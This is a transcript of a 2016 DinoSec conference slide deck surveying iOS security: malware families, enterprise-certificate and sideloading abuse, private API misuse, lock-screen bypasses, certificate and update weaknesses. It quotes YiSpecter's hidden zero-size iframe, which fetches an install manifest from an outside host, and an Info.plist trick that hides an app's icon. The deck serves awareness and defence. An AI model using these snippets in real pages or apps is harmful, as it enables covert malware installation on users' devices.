iOS: including Ordinary Security? - DinoSec2016 © Dino Security S.L. 2 All rights reserved.

2016 © Dino Security S.L. All rights reserved. Todos los derechos reservados.

iOS: including Ordinary Security?

www.navajanegra.com (#nn6ed)

Raúl SilesFounder & Senior Security [email protected] 1, 2016

w w w. d i n o s e c . c o m@ d i n o s e c

22016 © Dino Security S.L. www.dinosec.comAll rights reserved. Todos los derechos reservados.

"iOS is considered to be by many in the industry one of the most secure mobile platforms" .0.1


Outline

• iOS State-of-the-Art• Malware• Developers• Lock Screen• Digital Certificates• Software Updates• Wi-Fi• Conclusions


iOS State-of-the-Art


Market Share: Mobile Devices

Q2 2015:Android: 82.8%iOS: 13.9%WP: 2.6%BB: 0.3%Others: 0.4%

Consolidated trend to exceed more than 300 million units by quarter (Qx): 1,3 billions (2014)

Reference: http://www.idc.com/prodserv/smartphone-os-market-share.jsp


• iOS after 10 years…– 2007: iPhone 2G (iOS 1)– 2008: iPhone 3G (iOS 2)– 2009: iPhone 3GS (iOS 3)– 2010: iPhone 4 (iOS 4) + iPad 1– 2011: iPhone 4S (iOS 5) + iPad 2– 2012: iPhone 5 (iOS 6) + iPad 3 & 4 & mini– 2013: iPhone 5c & 5s (iOS 7) + iPad air & mini 2– 2014: iPhone 6 & 6+ (iOS 8) + iPad air 2 & mini 3– 2015: iPhone 6S & 6S+ (iOS 9) + iPad Pro 12,9" & mini 4

• Apple Watch & Apple Pencil

– 2016: iPhone SE + iPad Pro 9.7" + iPhone 7 & 7+ (iOS 10)

Security By (CVE) Numbers

6

Official numbers:

• iOS 9: 101• iOS 9.0.1: -• iOS 9.0.2: 1• iOS 9.1: 49• iOS 9.2: 50• iOS 9.2.1: 13• iOS 9.3: 39• iOS 9.3.1: -• iOS 9.3.2: 39• iOS 9.3.3: 46 • iOS 9.3.4: 1 • iOS 9.3.5: 3

iOS 9.x: 342

Official numbers:

• iOS 8: 56 • iOS 8.1: 5• iOS 8.1.1: 9• iOS 8.1.2: -• iOS 8.1.3: 34• iOS 8.2: 6• iOS 8.3: 58• iOS 8.4: 33• iOS 8.4.1: 71

iOS 8.x: 272

Official numbers:

• iOS 6: 197• iOS 7: 80• iOS 7.1: 41• …

Official numbers:

• wOS 1.0.1: 13• wOS 2.0: 39• wOS 2.0.1: 14• wOS 2.1: 30• wOS 2.2: 34• wOS 2.2.1: 26• wOS 2.2.2: 26

wOS x.y: 182

Official numbers?

• iOS 10: 7• iOS 10.0.1: 1• iOS 10.0.2: 0

• wOS 3: 1

Official numbers

• iOS 10: 49• iOS 10.0.1: 1• iOS 10.0.2: 0

• wOS 3: 19


Malware?


"If it has no name, it does not exist!"

How do we identify or classify malware families and specimens if there are no anti-virus (or anti-malware) solutions for iOS?– Malware (CME)– Vulnerabilities (CVE)


Recent iOS Malware Trends (1/2)

• “No iOS Zone” (DoS) – Malicious SSL certificates (iOS < 8.3) (Apr'15)– https://www.skycure.com/blog/ios-shield-allows-dos-attacks-on-ios-devices/– WiFiGate: https://www.skycure.com/blog/wifigate-how-mobile-carriers-expose-us-to-wi-fi-attacks/

• XARA: Unauthorized Cross-App Resource Access on MAC OS X and iOS (Jun'15)– https://drive.google.com/file/d/0BxxXk1d3yyuZOFlsdkNMSGswSGs/view?pli=1– http://www.imore.com/depth-look-ios-os-x-xara-vulnerabilities

• KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts (Aug'15)– http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-

to-create-free-app-utopia/ (for jailbroken devices)• Masque attack(s)…

– "Masque Attack: All Your iOS Apps Belong to Us" (Nov'14)• https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html

– Wirelurker (Nov'14): http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/– "iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking" (Feb'15)

• https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html– "Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking" (Jun'15)

• https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html

9


Recent iOS Malware Trends (2/2)

• …More masque attack(s)– "iOS Masque Attack Weaponized: A Real World Look" (Aug'15)

• https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html• XcodeGhost (Sep'15 & Nov'15)

– http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/

– https://blog.lookout.com/blog/2015/09/20/xcodeghost/– https://blog.lookout.com/blog/2015/09/21/xcodeghost-apps– https://blog.lookout.com/blog/2015/09/22/xcodeghost-detection/– https://www.fireeye.com/blog/threat-research/2015/11/xcodeghost_s_a_new.html

• ZergHelper: Pirated iOS App Store’s Client (…) Evaded Apple iOS Code Review (Feb'16)– http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-

ios-code-review/• AceDeceiver: iOS Trojan Exploiting Apple DRM Design Flaws (…) (Mar'16)

– http://researchcenter.paloaltonetworks.com/2016/03/acedeceiver-first-ios-trojan-exploiting-apple-drm-design-flaws-to-infect-any-ios-device/

• Pegasus: (Aug'16)– https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

10


iOS Malware

• Distributing Apps Out of the App Store• Abusing Apple Private APIs


Distributing Apps Out of the App Store

• Apple Developer Enterprise Program (vs. Apple Developer Program)– https://developer.apple.com/programs/enterprise/ ($299/year)

• Provision iOS apps for internal corporate distribution (in-house)– Enterprise certs and profiles can "only" be used for internal distribution– Technically, they can be used to install any app on any device

• Violating Apple's Developer Enterprise Program terms of service– Avoid Apple's App Store vetting process

• And it allows the usage of Apple private APIs (sensitive operations)

• User must accept the app installation (two taps)– In iOS 9 it is required to manually trust the developer (provisioning profile)

http://johannesluderschmidt.de/provision-ios-ipa-app-for-in-house-enterprise-distribution/


"Two taps to rule them all"


Apple Developer Enterprise Distribution Requirements

• Become an Apple enterprise "developer": $299/year• Generate a certificate to distribute iOS apps• Create a provisioning profile• Create the iOS app IPA file & associated Manifest file (PLIST)• Create an "itms-services" web link pointing to the Manifest

– The Manifest file includes the reference to the IPA file (app)• Own a web server with a valid trusted certificate (HTTPS)• Distribute the web link: E.g. Tweet, web page, e-mail, Google dork, etc.

– Real benign distribution cases in Spain and China

<a href="itms-services://?action=download-manifest&url=https:// www.dinosec.com/dist/app/manifest.plist">Install this app!</a>


Distributing Apps Out of the App Store: iOS 8 & 9+


Abusing Apple Private APIs (1/2)

• Objective-C– Message dispatch mechanism to invoke method/function calls– objc_msgSend (String parameters)

• Class name and method name• Not resolved statically, but at runtime (or execution time)

– Obfuscated and/or encrypted

– Load a library (dlopen) and access a function (dlsym)• Runtime (or NSClassFromString / NSSelectorFromString)

• Apple's App Store review or vetting process– Private APIs accessing sensitive user information


Abusing Apple Private APIs (2/2)

• "iRiS: Vetting Private API Abuse in iOS Applications" (Oct 2015)– Dynamic analysis of API calls that cannot be resolved statically

("suspicious")– 2,019 apps analyzed: 146 (7%) make use of 150 private APIs (25 critical)

• SourceDNA (Oct 2015) – Using the methods described in the previous slide…– 256 apps affected (+1 million downloads)– Youmi's Ad SDK (obfuscated binary ad library)

• It sends user info to a server in China– List of installed apps, current running being, serial number,

hardware components (peripherals), "e-mail" Apple ID…

http://www.cse.buffalo.edu/~mohaisen/classes/fall2015/cse709/docs/deng-ccs15.pdfhttps://sourcedna.com/blog/20151018/ios-apps-using-private-apis.html


YiSpecter (Oct 5, 2015)

• Distributed through an Apple Enterprise Developer certificate– Evades Apple's App Store vetting process– Targets both jailbroken and non-jailbroken iOS devices

• Extensive usage of private APIs– MobileInstallation: local app (.ipa file) install & uninstall capabilities– Claims a private entitlement key used by iOS system apps

• com.apple.private.mobileinstall.allowedSPI

– Monitor currently open app and displays advertisements• SpringBoardServices: SBSCopyFrontmostApplicationDisplayIdentifier• SpringBoardServices: SBSLaunchApplicationWithIdentifier

– Obtains the list of installed apps: MobileInstallationLookup– Mobile Safari manipulation: default search engine, bookmarks, etc.

http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/

<iframe src="itms-services://?action=download-manifest& url=https:// qvod.bb800.com/assets/upload/3794.plist" height=0 width=0></frame>


Abusing Apple iOS System Features

• Suppress the presence of the app icon from SpringBoard– Makes it harder to remove the app / malware (e.g. YiSpecter)

• Alternative: Reset the iOS device to factory defaults

• Info.plist file– Declares the properties & app– Undocumented feature

• Suppress SpringBoard from displaying the installed app icon

• Intended for Apple's system apps without UI components

– Deprecated as of iOS 8.3• iOS 8: com.apple.*

<dict> ...<key>CFBundleDisplayName</key><string>Passbook</string><key>CFBundleExecutable</key><string>NoIcon</string><key>CFBundleIdentifier</key><string>com.weiying.hiddenIconLaunch</string><key>CFBundleShortVersionString</key><string>2.3.0</string>...<key>SBAppTags</key><array>

<string>hidden</string></array>

http://www.zdziarski.com/blog/?p=5072


Another way of Temporarily Hiding iOS Apps

• iOS 7, 8 & 9 (9.3.2)– Non-jailbroken iOS devices

• The first SpringBoard pane (home screen) and the dock must be completely full of apps– App to hide must go into another app, to create a folder, and into

the dock at the end• Hidden apps are still accessible from Spotlight search

– Hidden apps are still visible from Settings – General – Storage & iCloud Usage – [Storage] Manage Storage – (List of installed apps)

• Hidden apps are restored after the iOS device reboots

https://www.youtube.com/watch?v=NlA-B_98K78


Temporarily Hiding iOS Apps


Developers


"Is this a bug or a feature?"


– Apps in the App Store (from 500 to 2M in 8 years)– Downloaded 130,000,000,000 times

– Registered developers– 2 million registered in the last year alone

• Anything strange here?

• San Francisco, June 13-17, 2016• 2,000,000

• 13,000,000

What Is This?


Developing for the Apple Mobile Ecosystem

• Apple developer membership options– Individual: Free or Apple Developer Program ($99/year)– Organization: Apple Developer (Enterprise) Program ($99 or $299/year)

• Prior to Xcode 7 (Sep 2015)– Rigorous control over the iOS developer community (regulated market)

• After Xcode 7: iOS app sideloading– A free Apple ID is all you need to start running any code on iOS devices

• No Apple ID extensive checks: anonymity via fake Apple IDs (e-mails)• A malware developer just needs physical access to an iOS device (USB connection)• Install, or even replace legitimate, iOS apps with malicious ones…

https://www.mi3security.com/why-2016-may-be-the-year-of-ios-malware/


iOS App Sideloading


Advanced App Capabilities

https://developer.apple.com/support/app-capabilities/


Su-A-Cyder (1/2)

• Toolset or framework to generate trojanized iOS apps / malware– Take a decrypted iOS app, inject it with evil code, resign the app with any Apple ID,

and install the repackaged app on any non-jailbroken iOS device– Home-Brewed iOS Malware PoC Generator (BlackHat ASIA 2016)

• http://blackhat.com/asia-16/briefings.html#su-a-cyder-homebrewing-malware-for-ios-like-a-b0$$– Threat or attack vector (not a vulnerability, and not malware)

• User must accept app installation prompt– Unlocked iOS device

• Full access to most data within the trojanized app– Corporate credentials, VPN access, healthcare records, etc.– Location info (GPS or EXIF), address book, calendar, Health Kit, etc.

https://www.mi3security.com/su-a-cyder-ios-malware/


Su-A-Cyder (2/2)

• Based on open-source tools• Cydia, Theos(-jailed), libimobiledevice, insert_dylib &

Spaceship/Fastlane– By Mi3 Security (Chilik Tamir)

• Evil .dylib (no need for original source code) - E.g. Cycript• Provisioning profile (Apple ID)

• Untrusted developer – Verify the developer app certificate is trusted on target iOS device– Settings – General – Device Management: Developer App (by Apple ID)– Trust "Apple ID" (developer)– Verify App via network connection for a specific iOS device (& Delete Apps)

https://github.com/Mi3Security/su-a-cyder


Su-A-Cyder: Skype

Based on: https://www.youtube.com/watch?v=oscx8AC0qUI


SandJacking

• Su-a-cyder app upgrades fixed by Apple in iOS 8.3 – Install process denies app upgrades with mismatched app ID (bundle ID)

• Alternative attack vector for iOS 8.3+– Backup device– Delete legitimate app– Install evil app– Restore backup over the evil app

• HITB (May 2016) by Mi3 Security (Chilik Tamir)– PoC tool, SandJacker, not released until it is fixed by Apple

https://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Chilik%20Tamir%20-%20Profiting%20from%20iOS%20Malware.pdf


Pangu 9 Jailbreak

• Pangu 9.2-9.3.3 on demand jailbreak– 64-bit devices only

• Vulnerability fixed in 9.3.4

• Tap-to-jailbreak app– First semi-untethered jailbreak (reboot device)– 7-day certificate vs. 1-year certificate

• Beijing Hong Yuan Online Technology (revoked – April 2017)• Trust developer (requires an Internet connection)

– Cydia Impactor: http://www.cydiaimpactor.com (Saurik)

http://en.pangu.io/help.html


• Jailbroken iOS device– iOS version? Vulnerable to jailbreak? Local or remote? 0-day?

• Non-jailbroken iOS device– App Store

• All code must be signed by an identified developer + Apple's review or vetting process• Malware in the official App Store

– Coin your own definition of mobile malware: WhatsApp, Linked-In…– LBTM, InstaStock, FindAndCall, Jekyll, FakeTor, XcodeGhost, InstaAgent, abusing private

APIs (e.g. Youmi's Ad SDK), ZergHelper, AceDeceiver (Apple's DRM flaws: FairPlay)

– Out of the App Store• Abuse private APIs (out of Apple's App Store review process)• Remote: Abusing Apple Enterprise Developer Certificates

– Third-party app stores: vShare, 25PP, Kuaiyong, 7659, etc.– Malicious apps: FinFisher, Pangu, Masque Attack, WireLurker, Hacking Team, Oneclickfraud,

YiSpecter…• Local: Sideloading iOS apps in Xcode 7+

– Su-a-Cyder, SandJacker and Pangu 9.2-9.3.3 jailbreak• MDM: SideStepper

iOS Malicious Apps Distribution Vectors


Digging in the Old TrunkiOS 9.3.2

iOS 10


Lock Screen


"Voice Hacking"


Bypassing iOS Lock Screen History

• Between 2011-2016…– iOS 5.x: 4 vulnerabilities– iOS 6.x: 8 vulnerabilities– iOS 7.x: 12 vulnerabilities– iOS 8.x: 11 vulnerabilities – iOS 9.x: 6 vulnerabilities (up to now, iOS 9.3.2…)

• Smartcover, SIM card, Control Center, Notifications Center, Siri…

• Temporary unauthorized physical access to device– Just a few seconds (or minutes)

http://blog.dinosec.com/2014/09/bypassing-ios-lock-screens.html

Updated with every single iOS version

since Sep 2014

2011


Bypassing iOS Lock Screen Via Siri

New iOS version released just to fix one of these bugs:

iOS 9.0.2 (CVE-2015-5923)


Digital Certificates


"If there is no CVE, there is no vulnerability"

“Today, I’m proud to say that at the end of 2016, App Transport Security (ATS) is becoming a requirement for App Store apps” Apple’s head of security engineering and architecture, Ivan KrsticWWDC 2016


"Continue" or "Details – Trust"

What Is This?

The double button of mass destruction!!


(Un)Manageable Digital Certificates

• Mobile Safari• iOS will never ask the user about that certificate

again…– Never ever! (iOS 9.3.2)

• Settings – Safari: "Clear History and Website Data" does not help• Even after rebooting the iOS device…

– Fake: Since iOS 7 • In previous iOS versions (e.g. 5.1.1): Settings – Safari and

selecting "Clear Cookies and Data" (and/or rebooting) does not help!

< 2012 ?


Digesting Digital Certificates


Managing Digital Certificates?

• Alternatively, before connecting to any website via Mobile Safari, install self-signed certs as configuration profiles– Settings – General – Profiles

• Delete the "offending" cert by…– … "Never use a cannon to kill a fly" (Confucius)– Removing all settings (or, at least, all network settings)…

• Settings – General – Reset – Reset All Settings• Settings – General – Reset – Reset Network Settings

• Configuration profile (MDM)– Security & Privacy: "Accept untrusted TLS certificates"


Software Updates


"Once a vulnerability gets a CVE assigned, and the vendor says it has been fixed… you don't

need to worry anymore, right?"


iOS & WatchOS Software Updates

• "iOS - Back to the Future" (March 2014) & "II" (December 2014)– Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2014iOS

• iOS: Settings – General – Software Update– http://mesu.apple.com/assets/com_apple_MobileAsset_SoftwareUpdate/

com_apple_MobileAsset_SoftwareUpdate.xml– http://mesu.apple.com/assets/com_apple_MobileAsset_SoftwareUpdateDocumentation/

com_apple_MobileAsset_SoftwareUpdateDocumentation.xml

• watchOS: Watch app – General – Software Update – http://mesu.apple.com/assets/watch/com_apple_MobileAsset_SoftwareUpdate/

com_apple_MobileAsset_SoftwareUpdate.xml– http://mesu.apple.com/assets/com_apple_MobileAsset_WatchSoftwareUpdateDocumentation

/com_apple_MobileAsset_WatchSoftwareUpdateDocumentation.xml

2014


iOS & watchOS Update Freeze

Video recorded on June 20, 2016 Latest versions available:

iOS 9.3.2watchOS 2.1.1


iOS Software Updates (Finally) Using HTTPS

• iOS 10– CVE-2016-4741: https://support.apple.com/es-es/HT207143

• Vulnerability lifecycle– Discovered in February 2012– Notified to Apple in February 2014– Disclosed publicly in March 2014– Partially fixed by Apple in September 2014

• iOS 8 (CVE-2014-4383)– Re-notified to Apple in November 2014 & May 2016

• To all security researchers…– You can do it! Yes, we can! J


Wi-Fi


"What vulnerabilities get a CVE assigned to them?"

"The ones that are really critical!"


Really Critical CVE J

• "Wi-Fi: Why iOS (Android & others) Fail inexplicably" (March 2013)– Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2013WiFi

• iOS 8.3 (April 8, 2015)– Probably you can get a CVE assigned to you too if you paid attention…

https://support.apple.com/en-us/HT204661

radius.dinosec.com

2013


A Not So Critical (Inexistent) CVE L

• "Wi-Fi: Why iOS (Android & others) Fail inexplicably" (March 2013)– Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2013WiFi

• Wi-Fi WPA(2)/Enterprise attacks (No CVE assigned: it's a feature, not a bug…)

Can youfind the

differences?


Wi-Fi Enterprise Networks: Set-Up


Wi-Fi Enterprise Networks


Conclusions


Spanish Collection of Proverbs

"An apple a day keeps the intruder

away"


Questions?

w w w. d i n o s e c . c o m@ d i n o s e c

R a ú l S i l e sr a u l @ d i n o s e c . c o m

iOS: including Ordinary Security? - DinoSec2016 © Dino Security S.L. 2 All rights reserved.

Documents

Transcript of iOS: including Ordinary Security? - DinoSec2016 © Dino Security S.L. 2 All rights reserved.